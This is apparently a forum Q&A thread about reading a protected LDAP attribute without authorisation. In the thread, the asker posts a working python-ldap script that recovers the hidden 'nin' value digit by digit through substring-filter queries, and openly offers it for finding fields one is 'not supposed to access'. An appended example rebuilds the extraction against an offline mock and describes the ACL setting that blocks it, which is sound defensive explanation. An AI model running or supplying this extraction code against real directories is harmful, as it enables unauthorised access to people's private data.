views: 25
answers: 2

I'm interested in reproducing a particular Python script.

I have a friend who was accessing an LDAP database without authentication. There was a particular field of interest, which we'll call nin (an integer) for reference, and this field wasn't accessible without proper authentication. However, my friend managed to access this field through some sort of binary search (rather than just looping through integers) on the data: he would check the first digit, checking whether it was greater or less than the starting value, and augment that until it returned a true value indicating existence, then add digits and continue checking until he found the exact value of the integer nin.

Any ideas on how he went about this? I have access to a similarly set-up database.

A: 

Your best bet would be to get authorization to access that field. You are circumventing the security of the database otherwise.

Patrick
That's the easy way. However, the field was accessible without proper authorization, and I'm trying to reproduce that and understand what's going on there; I don't have access to the script he wrote that could do this.
EricR
A: 

Figured it out. I just needed to filter on (&(cn=My name)(nin=guess*)) and I managed to filter until it returned the correct result.

Code follows in case anyone else needs to find a field they aren't supposed to access, but can check results for and know the name of.

import ldap
import ldap.filter


def lookup(self, username="", guess=0, verbose=0):
    """Find the value of the hidden 'nin' attribute for `username` by testing
    prefixes with a substring filter. Assumes a 7-digit nin with no leading
    zero (a matching prefix of 0 would recurse forever, since 0 * 10 == 0)."""
    guin = guess
    result_set = []
    # Filter on the name plus a prefix of the guessed value; the username is
    # escaped so that characters such as ')' or '*' cannot break the filter.
    varsearch = "(&(name=%s)(nin=%s*))" % (
        ldap.filter.escape_filter_chars(str(username)), guin)
    result_id = self.l.search("", ldap.SCOPE_SUBTREE, varsearch, ["nin"])
    while True:
        try:
            # all=0 returns one message at a time; 5 s timeout per message.
            result_type, result_data = self.l.result(result_id, 0, 5.0)
            if result_data == []:
                break  # RES_SEARCH_RESULT: no more entries for this filter
            if result_type == ldap.RES_SEARCH_ENTRY:
                result_set.append(result_data)
        except ldap.TIMEOUT:
            return {"name": username}
    if len(result_set) == 0:
        # No entry has this prefix: try the next value for the current digit.
        return self.lookup(username, guin + 1, verbose)
    if guess < 1000000:
        # The prefix exists: keep it and start guessing the next digit.
        return self.lookup(username, guess * 10, verbose)
    if verbose == 1:
        print("Bingo!", end=" ")
    return str(guess)
EricR
It isn't a binary search, but the time it takes to resolve the field is low enough that it doesn't matter. These are queries submitted by users, not scripts, so when it takes as long to load a webpage with a form as it does to search the data, there's no point in attempting any optimisation.
EricR
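The technique in the answer, as an added example that is not part of the original post or its author's script: the substring filter (nin=prefix*) is used purely as a yes/no oracle, and each digit of the hidden value is recovered with at most ten queries instead of enumerating the whole number. The example generalises the script above in two ways, keeping the prefix as a string (so leading zeros and values of unknown length are found) and escaping filter values as ldap.filter.escape_filter_chars does. To run offline it replaces the server with an in-memory mock; the directory, the cn values and the nin numbers are constructed test data, and the mock models only the one behaviour that matters here, that a filter assertion on an attribute the bind may not search evaluates to Undefined and so never matches.

```python
"""Digit-by-digit extraction of a hidden LDAP attribute through a substring
filter used as a yes/no oracle, and the server-side setting that stops it.

Added example, not code from the original post. The directory, entry and
'nin' values below are constructed test data; the mock server stands in
for python-ldap's search_s() so the script runs offline."""

from typing import Callable, Dict, List, Optional, Set

# Constructed directory: cn mapped to its attributes. nin is the hidden field.
DIRECTORY: Dict[str, Dict[str, str]] = {
    "My name": {"nin": "0123456"},
    "Other":   {"nin": "9876543"},
}

DIGITS = "0123456789"


def escape_filter_value(value: str) -> str:
    """RFC 4515 escaping for values placed inside a filter, equivalent to
    ldap.filter.escape_filter_chars. The answer's script concatenated the
    username unescaped, so a name containing ')' or '*' broke the filter."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\x00" else c for c in value)


def prefix_filter(cn: str, attr: str, prefix: str) -> str:
    """The filter the answer relied on: (&(cn=<name>)(<attr>=<prefix>*))."""
    return "(&(cn=%s)(%s=%s*))" % (escape_filter_value(cn), attr,
                                   escape_filter_value(prefix))


def make_oracle(directory: Dict[str, Dict[str, str]], searchable: Set[str],
                log: List[str]) -> Callable[[str, str, str], bool]:
    """Simulate the server evaluating prefix_filter() for an anonymous bind.
    `searchable` is the set of attributes this bind may use in filters. When
    an attribute is not searchable the assertion is Undefined and the AND
    filter does not match (RFC 4511 section 4.5.1.7), so the search returns
    nothing whatever the real value is. Every filter sent is logged."""
    def oracle(cn: str, attr: str, prefix: str) -> bool:
        log.append(prefix_filter(cn, attr, prefix))
        if attr not in searchable:
            return False
        entry = directory.get(cn)
        return entry is not None and entry.get(attr, "").startswith(prefix)
    return oracle


def extract_number(oracle: Callable[[str, str, str], bool], cn: str,
                   attr: str, max_len: int = 20) -> Optional[str]:
    """Recover the value one digit at a time: at most 10 queries per digit
    rather than 10**len. The prefix is a string, so leading zeros are found
    and the length need not be known; the loop stops when no digit extends
    the prefix any further."""
    prefix = ""
    for _ in range(max_len):
        for d in DIGITS:
            if oracle(cn, attr, prefix + d):
                prefix += d
                break
        else:  # no digit extends the prefix: value complete, or attribute hidden
            break
    return prefix or None


def demo():
    """Run the extraction against a leaky server and against a fixed one.
    Returns (leaked value, queries used, value from fixed server, queries)."""
    queries: List[str] = []
    leaky = make_oracle(DIRECTORY, searchable={"cn", "nin"}, log=queries)
    leaked = extract_number(leaky, "My name", "nin")
    leaky_queries = len(queries)

    queries.clear()
    fixed = make_oracle(DIRECTORY, searchable={"cn"}, log=queries)
    blocked = extract_number(fixed, "My name", "nin")
    return leaked, leaky_queries, blocked, len(queries)


if __name__ == "__main__":
    print(demo())  # ('0123456', 38, None, 10)
```

The practical point is in the mock's `searchable` set. Hiding an attribute from the search results is not enough: as long as the bind may use it in a filter, the server answers "does a matching entry exist" for any prefix, and seven digits cost a few dozen queries. In OpenLDAP this is the difference between the `search` and `read` privilege levels in the ACL for the attribute; anonymous binds need `none` on nin (for example `access to attrs=nin by self read by * none`) for the filter to stop acting as an oracle. The same check applies to any directory or API that lets an unprivileged caller filter on a field it cannot read.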